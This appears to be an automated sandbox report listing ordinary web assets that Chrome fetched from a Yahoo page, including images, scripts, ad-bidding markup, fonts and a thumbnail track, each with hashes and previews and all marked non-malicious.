                                                                                                                                                                                                                  Preview:......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.......C....................................................................C.........................................................................,............................................T...........................!."1..AQa.#2.BVq.....$R...3Cr...7FSb.....%....4cdestu...................................>........................!...1.."AQS.2aq..#$3BR....C..%45................?....=Q.u).wTz..aK....
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                  Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                  SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                  SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                  SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1615), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1615
                                                                                                                                                                                                                  Entropy (8bit):5.020901609734713
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:12732500BC8E47693F0D777BBE88001C
                                                                                                                                                                                                                  SHA1:97865CCE1C0CD35BAC8AC4B42DC9C6C394DA4809
                                                                                                                                                                                                                  SHA-256:A03F9A37E34771C42CF7930B2F466EA2077D149F6DBA0E81982E7715A87DD8EF
                                                                                                                                                                                                                  SHA-512:9ED4368E2415EDEFA87BB461BE701E268F93C076852660B2F3B2E661C25D66CDDDA0DBC236410361935365DD954FE1DDF07541CB44557DE25E85FB73BC2FE2BD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js
                                                                                                                                                                                                                  Preview:window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-content")[0],s=a&&a.getElementsByTagName("a")[0],n=s&&s.getAttribute("data-uuid"),o=function(t){var e;try{e=JSON.parse(window.localStorage.getItem(t))||{}}catch(t){}return e}(t);if(n!==o)e.classList.remove("D(n)"),Array.prototype.slice.call(e.getElementsByClassName("featurebar-close-button")).forEach((function(e){e.addEventListener("click",(function(){!function(t,e){try{window.localStorage.setItem(t,JSON.stringify(e))}catch(t){}}(t,n)}))}))}if(e.classList&&e.classList.contains&&e.classList.contains("auto-play")){var r=window.getComputedStyle(e).height,l=Array.prototype.slice.call(e.getElementsByClassName("featurebar-content")),i=0,c=(i+1)%l.length;function u(){setTimeout((function(){l[i].style.transitionDuration=".8s",l[i].style.transform="
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29171), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):29171
                                                                                                                                                                                                                  Entropy (8bit):5.306969057375951
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6441E6CD44203711A611CD3DB3C116B9
                                                                                                                                                                                                                  SHA1:FA424D29D3B5BCBAA9CEC2F9132B90F843878396
                                                                                                                                                                                                                  SHA-256:870DBD26A7FA2346B58C17892B3E754C545CFEDA22F4601F87BDEF81835E6252
                                                                                                                                                                                                                  SHA-512:7142E6020D47D805665BB9348DEA2051FB3DA0ED6A7230D8EBDE81A459A8045153F58C515920FD553F5853FF2F4D83C4152B9CD553B8FF097B0E51BF714D433D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-caas-1.36.6-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-caas",[],t):"object"==typeof exports?exports["wafer-caas"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-caas"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(a[r])return a[r].exports;var i=a[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var a={};return t.m=e,t.c=a,t.d=function(e,a,r){t.o(e,a)||Object.defineProperty(e,a,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(a,"a",a),a},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,a){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function i
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):15885
                                                                                                                                                                                                                  Entropy (8bit):5.529495043414076
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:463C9926968D3DE40512FB9923A6EA13
                                                                                                                                                                                                                  SHA1:D115F299EBB4BFE003542796A351BCC4979AEDF3
                                                                                                                                                                                                                  SHA-256:6BDA3343003BF898D25A5BC60BFE61391182E5EFD1211E38F9D0B90D2CBA2968
                                                                                                                                                                                                                  SHA-512:80FCCD62333F1BD0E80A24C3886265F3A023EB2E0C4801084519F2B2ED422C37E973959C7FC6FC25D45C415769A8F998E884C6B14A7D67AD81DF021C73B8CF7C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-games.GamesMini.atomic.ltr.be03a375386175922f163856820e511b.min.css","name":"react-wafer-games.GamesMini.atomic"},{"location":"top","value":"/aaq/fp/css/react-wafer-games.games-mini.cdd5050ba6288df47182412e30e482a4.css","name":"react-wafer-games.games-mini"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"},{"location":"bottom","value":"/aaq/wf/wf-tabs-1.12.6-modern.js","name":"wafer-tabs","version":"1.12.6"},{"location":"bottom","value":"/aaq/wf/wf-scrollview-2.23.3-modern.js","name":"wafer-scrollview","version":"2.23.3"},{"location":"bottom","value":"/aaq/wf/wf-image-1.4.0-modern.js","name":"wafer-image","version":"1.4.0"},{"location":"bottom","
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4173
                                                                                                                                                                                                                  Entropy (8bit):4.127662644119254
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:004FEC0C202A152F8EB4430FAEC27B60
                                                                                                                                                                                                                  SHA1:80A1596807A0CAB9A87D1C6A94AD58E65D9349DE
                                                                                                                                                                                                                  SHA-256:5180A75FCCE14CE0C34B5F861AC0E02DBEAB6138312EE7D43966785F26396D75
                                                                                                                                                                                                                  SHA-512:8641081C520FCCA7D3AAC4BD7AA7E0043DE09E55633F01A0A30010881E0A7C0EA647C20F820312BA8A698A7C880C94070539BBBBA03413596EE2CE122D23C97D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://gps-aa.ybp.yahoo.com/bid/yoo/adslot/13885/?pa=1
                                                                                                                                                                                                                  Preview:<!doctype html>.<html lang="en">.<body>. <script>. (() => {. const run = () => {.. const origin = "https://pa.ybp.yahoo.com";. const interestGroups = [{. name: "3397206",. owner: `${origin}`,. userBiddingSignals: {},. trustedBiddingSignalsUrl: `${origin}/v1/getvalues`,. trustedBiddingSignalsKeys: ['3397206'],. biddingLogicUrl: `${origin}/opus/tag/gps/bidding-logic.js`,. ads: [{. renderUrl: "https://pr.ybp.yahoo.com/pr/secure/true/adid/xp2N-SgaY82s5fW0nKa0XQ/pa/1",. allowedReportingOrigins: ["https://pn.ybp.yahoo.com"],. metadata: {. width: 728,. height: 90,. crid: 7462381,. adomain: ["yahoo.com"],. seat: "47",. ad: 16042004,. line: 3397206. }. },{. renderUrl: "https://pr.ybp.y
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):14034
                                                                                                                                                                                                                  Entropy (8bit):7.944084567358135
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D2DDD6DCFF071A2C86DCBF1967D29139
                                                                                                                                                                                                                  SHA1:1D8FA33B952DD6D572CD204231B6EC1EC6A020A1
                                                                                                                                                                                                                  SHA-256:8E58369F4B3A641F71D5E0BB4681EDFC531C2235002698F344342B3E8E658DD2
                                                                                                                                                                                                                  SHA-512:2C2AC274FA1CC62D72C6847DD573A42D4E829BDC32643AF1EFDA4DB61A178ADCFD9405906DB31EB8D9F6CDB721212B6D0AAFDB31D6D2923C3F3999D7C22E12B2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/cYTWHQTItgN5qkMGPgpgzA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_news_641/d1d0c2c5388127c3eaf1467a4d70c072.cf.webp
                                                                                                                                                                                                                  Preview:RIFF.6..WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .4..P....*....>y6.I$..$'q.....glC.:....s..x1.... .....#.../m..3...rx.....O.v+.._.....K..|=.....).u.q.q.....E~...K..5..z...+|..%...k.'~.....=.9...m.K<d...........7....6.7zbPc(..nG.....-..h.?N.i=.)SrP2...E..;.7...G.o5/>....LT..r;...#,R.}..Bo....O....<.... $........r.K....?.....w.1...b.'3.....}E9../0;..l..(,p.3C..._..+.z......,.O.>..e..l.E~...M..Y+Z.^...t..n.{)"Q'yL_.4..+..#...d.d....^M......FUmj.p.J.t..P.....a.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8762)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8783
                                                                                                                                                                                                                  Entropy (8bit):5.821623441899482
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6E2FA507CBA8075394E897AF870F90DC
                                                                                                                                                                                                                  SHA1:95CD1F3AE53A54FA8DD7609202A203FB0A793DC9
                                                                                                                                                                                                                  SHA-256:AEDE20528C5EFA4EDF6C5E1F69B843EA5CD0D27965980A268D4DDB6A913ECC00
                                                                                                                                                                                                                  SHA-512:9816186910F888D65BA27695C44F79B5814119B526AF7548495EFFC8DB74A24300803C1D4CD03F99CED0F5DDBD2E7C66072A9B3CE6ED293C972D65C4D6622FE4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:trc_json_response =.{"trc":{"si":"9304f0bb38870140155df966dbe8d7f5","sd":"v2_9304f0bb38870140155df966dbe8d7f5_c5962232-8b11-41f5-9135-f91a1b1008e6-tuctdf983a8_1728052776_1728052777_CIi3jgYQm9teGJ6T47-lMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAYABAA","ui":"c5962232-8b11-41f5-9135-f91a1b1008e6-tuctdf983a8","plc":"DESK","wi":"-2162821594718986386","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1551771","cpb":"EhMyMDI0MTAwMS0xOS1SRUxFQVNFGM_V29MGIJz__________wEqGWNoLnRhYm9vbGFzeW5kaWNhdGlvbi5jb20yCHRyYzgwMjY5OID2uUFAkaQOSNWmD1DZiNcDWPUDYwj9ehCJnQEYMGRjCNcWENUfGCNkYwjyJBDonAEYFGRjCJ5BEKRWGDZkYwiWFBCcHBgYZGMI0gMQ4AYYCGRjCNwVEPslGAlkYwiWWBCWdBgLZGMInmgQn4cBGD1kYwj_RhDplQEYHWRjCKQnEIM1GC9kYwj0FBCeHRgfZHgBgAHiI4gBy5mQ0gGQARiYAa2j47-lMtsBEAHcAQ","evh":"960892681","evi":{"48":"15741|20105","61":"13342|17311","47":"5028|6787"},"vl":[{"ri":"aeb71eb451c2aef72a5c1a4d1a3cb5c4","uip":"taboola-stream-2","ppb":"
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):42
                                                                                                                                                                                                                  Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                  SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                  SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                  SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://dns-lzsg3je5p.sombrero.yahoo.net/pixel.gif
                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65321
                                                                                                                                                                                                                  Entropy (8bit):7.968605743475869
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:3A3E7FF21032D8EB2FB7AFB6C30C2B2E
                                                                                                                                                                                                                  SHA1:79699EBE9D5363DFA264E0B53FC6C7E394654C4D
                                                                                                                                                                                                                  SHA-256:F747B5B50389865460173E492ACFC479E1F4B43478FE5507F4BCAFEA0D3A416A
                                                                                                                                                                                                                  SHA-512:CECA513FE75157E6EEC59F7E80F33203424BF4208BA5046FE3BF5CDD2E58271ECD58010F0FE70E70935E0D99AAAD37FA5D4B6DA06BA76AE940FC50F45EDC052D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C......................................................................................................................T..........................!..1A"Qa..2q..#B...Rr..$3b...C..%S....&4DTt....6Vs.......................................9.......................!..1..A.".#2Q$3Ba4Rq...%C.b.................?....R=.#.}p.....w.Ds<.r.O.#o..4.........A.N.TH...c....lz..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2482
                                                                                                                                                                                                                  Entropy (8bit):4.618253337400248
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:67CD86F2B85134ECD4204CEE00DFFAF9
                                                                                                                                                                                                                  SHA1:07B0B211F8D722775647CA82DE48685381A9A7E3
                                                                                                                                                                                                                  SHA-256:D15E6D93C15C580E902CE7F034E60E8E9036848441137C7F336A0436BCA61D39
                                                                                                                                                                                                                  SHA-512:917B99E9177034AAF095BC5E1011ABC48EC07DB331B87D8FAFB0DE6DD4F7991A0CD17E3E9DC99CE5D10F2F49AD19E87C7800537D95B8BAA46AD3B54D8490DE44
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://edge-mcdn.secure.yahoo.com/ybar/exp.json
                                                                                                                                                                                                                  Preview:{. "expCount":7,. "selection":"individual",. "uploadType":"group",. "runProb":10,. "expList":[. {. "name":"vpixiea",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-a<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"], . "timeout":5000. },. {. "name":"vpixieb",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-b<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"],. "timeout":5000. },. {. "name":"vpixiec",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/pixel.gif",. "target":"https://v-c<RAND>.wc.yahoodns.net/pixel.gif",. "trials":1,. "uploadEndpoints":["http
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4156
                                                                                                                                                                                                                  Entropy (8bit):7.956015229737862
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:EF23B45AD32E9D39258414272E48A4A7
                                                                                                                                                                                                                  SHA1:B2E67060B9B08E8BB32C90D601A58E300316E147
                                                                                                                                                                                                                  SHA-256:568ACE3CB8906226EB016B3588CD36141F294CBA206DFFB5C9C64F3C006EBA87
                                                                                                                                                                                                                  SHA-512:4D4ED37ADD9772686B9406475A73B03B6D36F23ACDC93EB8493D6C82E0EBD79C7101339AE5FAF1314793C6623FD2212C370BBA095C7C631733AFD956BE1A9533
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/glX3ayjfwg9mT1FXB0.LTg--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/9225efa0-81b8-11ef-8ba7-1c4b6a4fb570.cf.webp
                                                                                                                                                                                                                  Preview:RIFF4...WEBPVP8 (...pH...*,...>y8.I$."..v.....bn.|{.....-..C.........?..C...7....o.0_.^..b...........e.........k..{.Y.g...?.xg........e...............Q<...._.?..F...S...../5.[{.t..@$.0E.NA...#._\y.~.6*".5....|.5..^...] .L.(.@.l....H..]nzA..J5.G@..5*...bK.x....aL.Z..............YhXi.....6.V.Q.....,.w..)..J4.....S.&.-Ab./....yw}V;p....Z...o........a.......l8.._..'{..8u.I.'....'.P..L.q../...Nc..O.c.D.......`.B..YmD.79.C4.......&......-...R.6-.j1.T.._r..O....S.....}..........!..{...E.3.pS....Q.......CM..i.Axe...W......[<.......,Z..T...W..W......e...(.-..@m0.w_..b.;..KUNX.....ul...."..Y...C.(...!.f...(,...Fp..v!....3;.4h`b..0.'7..~.b3.......<ig..o.A.f............. ~.C..Y6en.=&......\...r._..........:iH..L...L.4...:...Y...bD*.._:w...5......&.'.Y.<.jwhS.:$Q.ma..-..Gp0.O...3:.DA.D.....).cG.'.J.......R..D..?3:......`.Vp...y...~........,D..h.......`....*...f.....w"..b.\j...ySo..G....T......V.p"N.op.!T.\.8....J9...1c.@mZ..7p.WI.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2585
                                                                                                                                                                                                                  Entropy (8bit):5.001752684892279
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5B65F13DE57D9234113B2BD27E125781
                                                                                                                                                                                                                  SHA1:93B6D5CC546DB57531741694374958FE1B53F935
                                                                                                                                                                                                                  SHA-256:2D4027FA94C7F761405FDF4C959FD8B182DF8AC4FCAA20E6D5466259E3B74450
                                                                                                                                                                                                                  SHA-512:A985B84895927ADAC952A61B9AFDC21F88D1155DE5C16CC911389F8635F4DF26CC592090C7D8C9EF69DFFBCD080C12717F0708BC4A00152FC9888D656826CBCD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/static/22/228515c2-9c18-491a-a142-95df43dd9630.css
                                                                                                                                                                                                                  Preview:@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans Black'), local('YahooSans-Black'),. url('//cdn.taboola.com/static/96/96222d7a-b7a8-4ca5-bfe7-008ade6e5ae3.ttf') format('truetype');. font-weight: 900;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans ExtraBold'), local('YahooSans-ExtraBold'),. url('//cdn.taboola.com/static/4d/4d1a609b-f3ba-4e89-a524-446fccbad58f.ttf') format('truetype');. font-weight: bold;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans Medium'), local('YahooSans-Medium'),. url('//cdn.taboola.com/static/d5/d583f597-33a2-439d-b6e0-84e966517fa4.ttf') format('truetype');. font-weight: 500;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans ExtraLight'), local('YahooSans-ExtraLight'),. url('//cdn.taboo
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (341)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5824
                                                                                                                                                                                                                  Entropy (8bit):4.917562103573868
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:13F901DD83BC8C3D6C892E0E0B720550
                                                                                                                                                                                                                  SHA1:B6A91C30E6FEB5B9F673FF32161E94486E31BBAF
                                                                                                                                                                                                                  SHA-256:C277622BD2ABBC2AACE655E55FB306D9F7F07702DB9F2726A611E2DDDBD0023C
                                                                                                                                                                                                                  SHA-512:6B58B29435B1416508CA1C1A83F3FF00CABDFFB4192FF1412BAAB15C5DD43B88A8BF985BD96B6C124E935F8AEE66D6F5B3D92302F34307CF243E4E3EA88894A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://manifest.prod.boltdns.net/thumbnail/v1/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/facdab7a-7629-4f80-9d4f-6355b5f33bd4/thumbnail.webvtt?fastly_token=NjcwMDBjNTBfZjZiMzY1ZWRiMDg1MDA2NDQzYjcxZDIyZmI0MzJjZjZiMmEyY2Q0YjE0ZmJhNzFlNzQ2YTk1NGRmZTBmY2RlNA%3D%3D
                                                                                                                                                                                                                  Preview:WEBVTT..00:00.000 --> 00:05.000.https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/0s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/0s/match/image.jpeg*~hmac=68f1c2911b34518d7e3c0dbeed80cfa790dba7cf660a21ab9427543a1aaee949..00:05.000 --> 00:10.000.https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/5s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/5s/match/image.jpeg*~hmac=30a34176bec28718850fab2edf58bcfbe91d1cf05ee095865ef74bad94bc52c1..00:10.000 --> 00:15.000.https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/10s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):85336
                                                                                                                                                                                                                  Entropy (8bit):7.402515364470518
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F35AD0C20D2F7E02B99E4866A98989D1
                                                                                                                                                                                                                  SHA1:7E9960316F3EB5BC7B5F2FDA0B761ACF0CA898B1
                                                                                                                                                                                                                  SHA-256:86145E56E9B4BD3A42E3DDF6B7CB6BC8E9372891AA5BAE35EA0F3FACDA3C99AA
                                                                                                                                                                                                                  SHA-512:253FE78F7EA21143F4C8D0FEDBB29EB3DEBF6B08E5ECAB1CF2A4C0DEE1F80D9A870E6847AA9FB9A39D8D2F4E601594B633869B2FE77F8A1C3363372E6FF477CB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/pv/static/misc/voice-error-202105050733.wav:2f823ded1e9741:0
